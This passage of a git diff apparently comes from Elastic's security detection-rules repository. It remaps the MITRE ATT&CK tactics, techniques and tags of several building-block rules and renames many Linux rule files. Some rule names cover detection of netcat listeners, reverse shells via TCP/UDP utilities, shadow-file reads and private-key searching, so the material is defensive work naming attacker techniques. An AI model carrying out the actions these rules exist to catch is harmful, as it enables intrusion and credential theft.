= "f59668de-caa0-4b84-94c1-3a1549e1e798" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Rule Type: BBR", - "Data Source: Sysmon", - "Data Source: Elastic Endgame", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -51,31 +41,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.006" -name = "Windows Remote Management" -reference = "https://attack.mitre.org/techniques/T1021/006/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml b/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml index f4aaaef461d..eed1c2780d2 100644 --- a/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml +++ b/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -43,29 +43,18 @@ event.dataset: aws.cloudtrail and event.provider: "iam.amazonaws.com" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/persistence_github_new_pat_for_user.toml b/rules_building_block/persistence_github_new_pat_for_user.toml index a65b0128137..74a5af6d46e 100644 --- a/rules_building_block/persistence_github_new_pat_for_user.toml +++ b/rules_building_block/persistence_github_new_pat_for_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -17,14 +17,7 @@ name = "First Occurrence of Personal Access Token (PAT) Use For a GitHub User" risk_score = 21 rule_id = "f94e898e-94f1-4545-8923-03e4b2866211" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Persistence", - "Rule Type: BBR", - "Data Source: Github", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Defense Evasion", "Data Source: Github"] timestamp_override = "event.ingested" type = "new_terms" @@ -37,22 +30,21 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["user.name", "github.hashed_token"] diff --git a/rules_building_block/persistence_github_new_user_added_to_organization.toml b/rules_building_block/persistence_github_new_user_added_to_organization.toml index ebf6de67223..0afb472c332 100644 --- a/rules_building_block/persistence_github_new_user_added_to_organization.toml +++ b/rules_building_block/persistence_github_new_user_added_to_organization.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -35,19 +35,18 @@ configuration where event.dataset == "github.audit" and event.action == "org.add [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml index e4a2ed6fd5e..79e94ce2457 100644 --- a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml +++ b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/07/24" integration = ["aws"] maturity = "production" -updated_date = "2024/11/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,20 +84,12 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" @@ -108,17 +100,30 @@ id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules_building_block/persistence_startup_folder_lnk.toml b/rules_building_block/persistence_startup_folder_lnk.toml index 0cfb8ff93eb..ac4429fcf95 100644 --- a/rules_building_block/persistence_startup_folder_lnk.toml +++ b/rules_building_block/persistence_startup_folder_lnk.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -48,24 +48,18 @@ file where host.os.type == "windows" and event.type != "deletion" and file.exten [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" -[[rule.threat.technique.subtechnique]] -id = "T1547.009" -name = "Shortcut Modification" -reference = "https://attack.mitre.org/techniques/T1547/009/" - - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/persistence_transport_agent_exchange.toml b/rules_building_block/persistence_transport_agent_exchange.toml index cbc31115a3e..d5f3bc49190 100644 --- a/rules_building_block/persistence_transport_agent_exchange.toml +++ b/rules_building_block/persistence_transport_agent_exchange.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,36 +84,18 @@ case_insensitive = true value = "?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*\\\\tmp_????????.???\\\\tmp_????????.???.ps?1" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" + [[rule.threat.technique.subtechnique]] id = "T1505.002" name = "Transport Agent" reference = "https://attack.mitre.org/techniques/T1505/002/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/persistence_web_server_potential_sql_injection.toml b/rules_building_block/persistence_web_server_potential_sql_injection.toml index a6611cbeb3b..93d46c613b7 100644 --- a/rules_building_block/persistence_web_server_potential_sql_injection.toml +++ b/rules_building_block/persistence_web_server_potential_sql_injection.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" -updated_date = "2026/03/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -28,21 +28,7 @@ name = "Web Server Potential SQL Injection Request" risk_score = 21 rule_id = "7f7a0ee1-7b6f-466a-85b4-110fb105f5e2" severity = "low" -tags = [ - "Domain: Web", - "Use Case: Threat Detection", - "Tactic: Reconnaissance", - "Tactic: Credential Access", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Nginx", - "Data Source: Apache", - "Data Source: Apache Tomcat", - "Data Source: IIS", - "Data Source: Traefik", - "Rule Type: BBR", -] +tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Reconnaissance", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -62,45 +48,14 @@ any where url.original like~ ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -115,11 +70,6 @@ id = "T1595.002" name = "Vulnerability Scanning" reference = "https://attack.mitre.org/techniques/T1595/002/" -[[rule.threat.technique.subtechnique]] -id = "T1595.003" -name = "Wordlist Scanning" -reference = "https://attack.mitre.org/techniques/T1595/003/" - [rule.threat.tactic] id = "TA0043" name = "Reconnaissance" diff --git a/rules_building_block/persistence_web_server_sus_file_creation.toml b/rules_building_block/persistence_web_server_sus_file_creation.toml index 3141a9913dc..681676e92cf 100644 --- a/rules_building_block/persistence_web_server_sus_file_creation.toml +++ b/rules_building_block/persistence_web_server_sus_file_creation.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/03/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -47,16 +47,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "esql" @@ -129,34 +120,3 @@ reference = "https://attack.mitre.org/techniques/T1505/003/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml b/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml index 39bc5a78dcd..619231cfd90 100644 --- a/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml +++ b/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2021/05/17" integration = ["aws"] maturity = "production" -updated_date = "2025/11/03" +updated_date = "2026/03/23" [rule] author = ["Austin Songer", "Elastic"] @@ -68,17 +68,7 @@ references = ["https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessio risk_score = 21 rule_id = "b45ab1d2-712f-4f01-a751-df3826969807" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS STS", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", - "Rule Type: BBR", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Use Case: Identity and Access Audit", "Resources: Investigation Guide", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" @@ -92,34 +82,21 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", From 9ae86ae3b410aa5c5a8b2df2a5f770fdb10bae26 Mon Sep 17 00:00:00 2001 From: Ruben Groenewoud Date: Tue, 24 Mar 2026 10:39:18 +0100 Subject: [PATCH 04/16] __ --- ...b_process_hooking.toml => collection_gdb_process_hooking.toml} | 0 ...se_dumping.toml => collection_potential_database_dumping.toml} | 0 ...ction_sensitive_files.toml => collection_sensitive_files.toml} | 0 ... collection_sensitive_files_compression_inside_container.toml} | 0 ...nd_control_cupsd_foomatic_rip_suspicious_child_execution.toml} | 0 ... => command_and_control_curl_or_wget_executed_via_lolbin.toml} | 0 ...d_control_egress_connection_from_entrypoint_in_container.toml} | 0 ... command_and_control_file_execution_followed_by_deletion.toml} | 0 ...control_file_transfer_or_listener_established_via_netcat.toml} | 0 ..._hook_netcon.toml => command_and_control_git_hook_netcon.toml} | 0 ...lwrap.toml => command_and_control_nc_listener_via_rlwrap.toml} | 0 ...ml => command_and_control_network_event_post_compilation.toml} | 0 ..._control_pluggable_authentication_module_source_download.toml} | 0 ...ml => command_and_control_shell_openssl_client_or_server.toml} | 0 ...toml => command_and_control_shell_via_background_process.toml} | 0 ...=> command_and_control_shell_via_child_tcp_utility_linux.toml} | 0 ...> command_and_control_shell_via_lolbin_interpreter_linux.toml} | 0 ....toml => command_and_control_shell_via_suspicious_binary.toml} | 0 ...l => command_and_control_shell_via_tcp_cli_utility_linux.toml} | 0 ...l => command_and_control_shell_via_udp_cli_utility_linux.toml} | 0 ...ommand_and_control_simple_web_server_connection_accepted.toml} | 0 ...ownload.toml => command_and_control_ssh_it_worm_download.toml} | 0 ...ystemd_netcon.toml => command_and_control_systemd_netcon.toml} | 0 ... => command_and_control_telnet_network_activity_external.toml} | 0 ...l => command_and_control_web_server_sus_destination_port.toml} | 0 ...ac_permissions.toml => credential_access_dac_permissions.toml} | 0 ...ivity.toml => credential_access_kubeconfig_file_activity.toml} | 0 ...very.toml => credential_access_kubeconfig_file_discovery.toml} | 0 ...al_access_kubernetes_direct_api_request_via_curl_or_wget.toml} | 0 ...h_binaries.toml => credential_access_modify_ssh_binaries.toml} | 0 ...edential_access_pluggable_authentication_module_creation.toml} | 0 ..._pluggable_authentication_module_creation_in_unusual_dir.toml} | 0 ...credential_access_potential_bruteforce_malware_infection.toml} | 0 ...d.toml => credential_access_potential_hack_tool_executed.toml} | 0 ...redential_access_private_key_password_searching_activity.toml} | 0 ...redential_access_security_file_access_via_common_utility.toml} | 0 ...dow_file_read.toml => credential_access_shadow_file_read.toml} | 0 ...access_suspicious_network_tool_launched_inside_container.toml} | 0 ...toml => defense_evasion_abnormal_process_id_file_created.toml} | 0 ...ce_boot_file_copy.toml => defense_evasion_boot_file_copy.toml} | 0 ..._write_user.toml => defense_evasion_bpf_probe_write_user.toml} | 0 ...map_load.toml => defense_evasion_bpf_program_or_map_load.toml} | 0 ...ml => defense_evasion_chown_chmod_unauthorized_file_read.toml} | 0 ..._evasion_file_made_executable_via_chmod_inside_container.toml} | 0 ...e_load.toml => defense_evasion_insmod_kernel_module_load.toml} | 0 ...l_driver_load.toml => defense_evasion_kernel_driver_load.toml} | 0 ...t.toml => defense_evasion_kernel_driver_load_by_non_root.toml} | 0 ...defense_evasion_kernel_module_load_from_unusual_location.toml} | 0 ...e_creation.toml => defense_evasion_kworker_file_creation.toml} | 0 ..._elevation.toml => defense_evasion_kworker_uid_elevation.toml} | 0 ...rker_netcon.toml => defense_evasion_linux_kworker_netcon.toml} | 0 ...l => defense_evasion_load_and_unload_of_kernel_via_kexec.toml} | 0 ...oml => defense_evasion_netcon_from_rwx_mem_region_binary.toml} | 0 ...> defense_evasion_process_backgrounded_by_unusual_parent.toml} | 0 ... => defense_evasion_process_started_from_process_id_file.toml} | 0 ...fense_evasion_process_started_in_shared_memory_directory.toml} | 0 ...non_root.toml => defense_evasion_sda_disk_mount_non_root.toml} | 0 ..._creation.toml => defense_evasion_shared_object_creation.toml} | 0 ...inary.toml => defense_evasion_shell_evasion_linux_binary.toml} | 0 ...ense_evasion_sus_extraction_or_decrompression_via_funzip.toml} | 0 ...oml => defense_evasion_suspicious_chown_fowner_elevation.toml} | 0 ... => defense_evasion_system_binary_file_permission_change.toml} | 0 ...tion_tc_bpf_filter.toml => defense_evasion_tc_bpf_filter.toml} | 0 ...ution.toml => defense_evasion_unusual_kthreadd_execution.toml} | 0 ..._pam_grantor.toml => defense_evasion_unusual_pam_grantor.toml} | 0 ...efense_evasion_unusual_path_invocation_from_command_line.toml} | 0 ...g.toml => defense_evasion_virtual_machine_fingerprinting.toml} | 0 ...eter_linux.toml => discovery_shell_via_meterpreter_linux.toml} | 0 ... discovery_suspicious_executable_running_system_commands.toml} | 0 ...xecution.toml => execution_apt_package_manager_execution.toml} | 0 ...ager_netcon.toml => execution_apt_package_manager_netcon.toml} | 0 ...stence_at_job_creation.toml => execution_at_job_creation.toml} | 0 ...ce_cron_job_creation.toml => execution_cron_job_creation.toml} | 0 ...c_rip_netcon.toml => execution_cupsd_foomatic_rip_netcon.toml} | 0 ...on.toml => execution_dbus_unsual_daemon_parent_execution.toml} | 0 ..._git_hook_execution.toml => execution_git_hook_execution.toml} | 0 ...s_execution.toml => execution_git_hook_process_execution.toml} | 0 ...ser.toml => execution_interactive_shell_from_system_user.toml} | 0 ...l_spawn.toml => execution_potential_wildcard_shell_spawn.toml} | 0 ...or.toml => execution_suspicious_ssh_execution_xzbackdoor.toml} | 0 ...ervice_started.toml => execution_systemd_service_started.toml} | 0 ...hell_execution.toml => execution_systemd_shell_execution.toml} | 0 ...ld_process.toml => execution_unusual_exim4_child_process.toml} | 0 ...d_spawned.toml => execution_web_server_sus_child_spawned.toml} | 0 ...ution.toml => execution_web_server_sus_command_execution.toml} | 0 ...n.toml => execution_web_server_unusual_command_execution.toml} | 0 ...le_deletion.toml => impact_authorized_keys_file_deletion.toml} | 0 ...asion_rename_esxi_files.toml => impact_rename_esxi_files.toml} | 0 ...toml => impact_suspicious_mining_process_creation_events.toml} | 0 ..._or_group_deletion.toml => impact_user_or_group_deletion.toml} | 0 ...ml => initial_access_linux_shell_activity_via_web_server.toml} | 0 ...k.toml => initial_access_potential_bufferoverflow_attack.toml} | 0 ...er.toml => initial_access_ssh_via_backdoored_system_user.toml} | 0 ...cess.toml => lateral_movement_unusual_sshd_child_process.toml} | 0 ...modif.toml => persistence_ld_preload_shared_object_modif.toml} | 0 ...vasion_ld_so_creation.toml => persistence_ld_so_creation.toml} | 0 ..._link.toml => persistence_linux_suspicious_symbolic_link.toml} | 0 ...lation_sudo_hijacking.toml => persistence_sudo_hijacking.toml} | 0 ...e_write.toml => persistence_suspicious_passwd_file_write.toml} | 0 ...> privilege_escalation_process_capability_set_via_setcap.toml} | 0 ...oml => privilege_escalation_setuid_setgid_capability_set.toml} | 0 ...on.toml => privilege_escalation_unusual_pkexec_execution.toml} | 0 102 files changed, 0 insertions(+), 0 deletions(-) rename rules/linux/{credential_access_gdb_process_hooking.toml => collection_gdb_process_hooking.toml} (100%) rename rules/linux/{exfiltration_potential_database_dumping.toml => collection_potential_database_dumping.toml} (100%) rename rules/linux/{credential_access_collection_sensitive_files.toml => collection_sensitive_files.toml} (100%) rename rules/linux/{credential_access_collection_sensitive_files_compression_inside_container.toml => collection_sensitive_files_compression_inside_container.toml} (100%) rename rules/linux/{execution_cupsd_foomatic_rip_suspicious_child_execution.toml => command_and_control_cupsd_foomatic_rip_suspicious_child_execution.toml} (100%) rename rules/linux/{defense_evasion_curl_or_wget_executed_via_lolbin.toml => command_and_control_curl_or_wget_executed_via_lolbin.toml} (100%) rename rules/linux/{execution_egress_connection_from_entrypoint_in_container.toml => command_and_control_egress_connection_from_entrypoint_in_container.toml} (100%) rename rules/linux/{execution_file_execution_followed_by_deletion.toml => command_and_control_file_execution_followed_by_deletion.toml} (100%) rename rules/linux/{execution_file_transfer_or_listener_established_via_netcat.toml => command_and_control_file_transfer_or_listener_established_via_netcat.toml} (100%) rename rules/linux/{persistence_git_hook_netcon.toml => command_and_control_git_hook_netcon.toml} (100%) rename rules/linux/{execution_nc_listener_via_rlwrap.toml => command_and_control_nc_listener_via_rlwrap.toml} (100%) rename rules/linux/{execution_network_event_post_compilation.toml => command_and_control_network_event_post_compilation.toml} (100%) rename rules/linux/{persistence_pluggable_authentication_module_source_download.toml => command_and_control_pluggable_authentication_module_source_download.toml} (100%) rename rules/linux/{execution_shell_openssl_client_or_server.toml => command_and_control_shell_openssl_client_or_server.toml} (100%) rename rules/linux/{execution_shell_via_background_process.toml => command_and_control_shell_via_background_process.toml} (100%) rename rules/linux/{execution_shell_via_child_tcp_utility_linux.toml => command_and_control_shell_via_child_tcp_utility_linux.toml} (100%) rename rules/linux/{execution_shell_via_lolbin_interpreter_linux.toml => command_and_control_shell_via_lolbin_interpreter_linux.toml} (100%) rename rules/linux/{execution_shell_via_suspicious_binary.toml => command_and_control_shell_via_suspicious_binary.toml} (100%) rename rules/linux/{execution_shell_via_tcp_cli_utility_linux.toml => command_and_control_shell_via_tcp_cli_utility_linux.toml} (100%) rename rules/linux/{execution_shell_via_udp_cli_utility_linux.toml => command_and_control_shell_via_udp_cli_utility_linux.toml} (100%) rename rules/linux/{persistence_simple_web_server_connection_accepted.toml => command_and_control_simple_web_server_connection_accepted.toml} (100%) rename rules/linux/{lateral_movement_ssh_it_worm_download.toml => command_and_control_ssh_it_worm_download.toml} (100%) rename rules/linux/{persistence_systemd_netcon.toml => command_and_control_systemd_netcon.toml} (100%) rename rules/linux/{lateral_movement_telnet_network_activity_external.toml => command_and_control_telnet_network_activity_external.toml} (100%) rename rules/linux/{persistence_web_server_sus_destination_port.toml => command_and_control_web_server_sus_destination_port.toml} (100%) rename rules/linux/{privilege_escalation_dac_permissions.toml => credential_access_dac_permissions.toml} (100%) rename rules/linux/{lateral_movement_kubeconfig_file_activity.toml => credential_access_kubeconfig_file_activity.toml} (100%) rename rules/linux/{discovery_kubeconfig_file_discovery.toml => credential_access_kubeconfig_file_discovery.toml} (100%) rename rules/linux/{execution_kubernetes_direct_api_request_via_curl_or_wget.toml => credential_access_kubernetes_direct_api_request_via_curl_or_wget.toml} (100%) rename rules/linux/{persistence_credential_access_modify_ssh_binaries.toml => credential_access_modify_ssh_binaries.toml} (100%) rename rules/linux/{persistence_pluggable_authentication_module_creation.toml => credential_access_pluggable_authentication_module_creation.toml} (100%) rename rules/linux/{persistence_pluggable_authentication_module_creation_in_unusual_dir.toml => credential_access_pluggable_authentication_module_creation_in_unusual_dir.toml} (100%) rename rules/linux/{impact_potential_bruteforce_malware_infection.toml => credential_access_potential_bruteforce_malware_infection.toml} (100%) rename rules/linux/{execution_potential_hack_tool_executed.toml => credential_access_potential_hack_tool_executed.toml} (100%) rename rules/linux/{discovery_private_key_password_searching_activity.toml => credential_access_private_key_password_searching_activity.toml} (100%) rename rules/linux/{discovery_security_file_access_via_common_utility.toml => credential_access_security_file_access_via_common_utility.toml} (100%) rename rules/linux/{privilege_escalation_shadow_file_read.toml => credential_access_shadow_file_read.toml} (100%) rename rules/linux/{discovery_suspicious_network_tool_launched_inside_container.toml => credential_access_suspicious_network_tool_launched_inside_container.toml} (100%) rename rules/linux/{execution_abnormal_process_id_file_created.toml => defense_evasion_abnormal_process_id_file_created.toml} (100%) rename rules/linux/{persistence_boot_file_copy.toml => defense_evasion_boot_file_copy.toml} (100%) rename rules/linux/{persistence_bpf_probe_write_user.toml => defense_evasion_bpf_probe_write_user.toml} (100%) rename rules/linux/{persistence_bpf_program_or_map_load.toml => defense_evasion_bpf_program_or_map_load.toml} (100%) rename rules/linux/{privilege_escalation_chown_chmod_unauthorized_file_read.toml => defense_evasion_chown_chmod_unauthorized_file_read.toml} (100%) rename rules/linux/{execution_file_made_executable_via_chmod_inside_container.toml => defense_evasion_file_made_executable_via_chmod_inside_container.toml} (100%) rename rules/linux/{persistence_insmod_kernel_module_load.toml => defense_evasion_insmod_kernel_module_load.toml} (100%) rename rules/linux/{persistence_kernel_driver_load.toml => defense_evasion_kernel_driver_load.toml} (100%) rename rules/linux/{persistence_kernel_driver_load_by_non_root.toml 